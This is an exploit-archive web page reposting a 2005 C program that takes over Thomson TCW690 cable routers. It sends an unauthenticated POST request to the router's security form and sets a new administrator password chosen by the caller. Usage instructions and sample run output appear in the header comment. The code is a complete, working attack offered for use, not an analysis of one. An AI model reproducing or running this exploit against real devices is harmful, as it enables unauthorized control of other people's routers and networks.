首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Thomson TCW690 POST Password Validation Remote Exploit
来源:murdok.lnx@gmail.com 作者:MurDoK 发布时间:2005-02-21  

Thomson TCW690 POST Password Validation Remote Exploit

/*****************************************************************
* Thomson TCW690 POST Password Validation exploit
*
* Tested with hardware version 2.1 and software version ST42.03.0a
* Bug found by: MurDoK <murdok.lnx at gmail.com>
* Date: 02.19.2005
*
* sh-3.00$ gcc mdk_tcw690.c -o tcw690
* sh-3.00$ ./tcw690 192.168.0.1 123
* *****************************************
* c
* Change password exploit coded by MurDoK
* *****************************************
*
* [1] Connecting...
* [2] Sending POST request...
* [3] Done! go to http://192.168.0.1
* sh-3.00$
*
* fuck AUNA :/
******************************************************************/

#include <netdb.h>

int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;

char badcode[1000] =
"POST /goform/RgSecurity HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Referer: http://192.168.0.1/RgSecurity.asp\r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Host: 192.168.0.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"
"Content-Length: 62\r\n"
"\r\n";
//"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00";


int main(int argc, char *argv[]) {

// system("clear");
printf("*****************************************\n");
printf(" Thomson TCW690 POST Password Validation\n");
printf(" Change password exploit coded by MurDoK\n");
printf("*****************************************\n\n");

if(argc<3) {
printf("Usage: %s <router IP> <new_password>\n\n", argv[0]);
exit(1);
}

fd = socket(AF_INET, SOCK_STREAM, 0);

he = gethostbyname(argv[1]);
memset((char *) &sock, 0, sizeof(sock));

sock.sin_family = AF_INET;
sock.sin_port=htons(80);
sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);

printf("[1] Connecting... \n");

if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
printf("ERROR: Can't connect to host!\n");
return 0;
}

strcat(badcode, "Password=");
strcat(badcode, argv[2]);
strcat(badcode, "&PasswordReEnter=");
strcat(badcode, argv[2]);
strcat(badcode, "&RestoreFactoryNo=0x00");

printf("[2] Sending POST request...\n");
write(fd, badcode, strlen(badcode));

printf("[3] Done! go to http://%s\n", argv[1]);

close(fd);

return 1;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DelphiTurk CodeBank 3.1 Local
·Cfengine RSA Authentication Re
·DelphiTurk e-Posta v1.0 Local
·Nullsoft SHOUTcast v1.9.4 remo
·3com 3CDaemon FTP Unauthorized
·Arkeia Backup Client Remote Ac
·Medal of Honor Spearhead Dedic
·SHOUTcast DNAS/Linux v1.9.4 fo
·Typespeed Proof of Concept Loc
·Nullsoft SHOUTcast v1.9.4 remo
·Arkeia 5.3.x Type 77 Request R
·Linux Vulnerability Allows Non
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved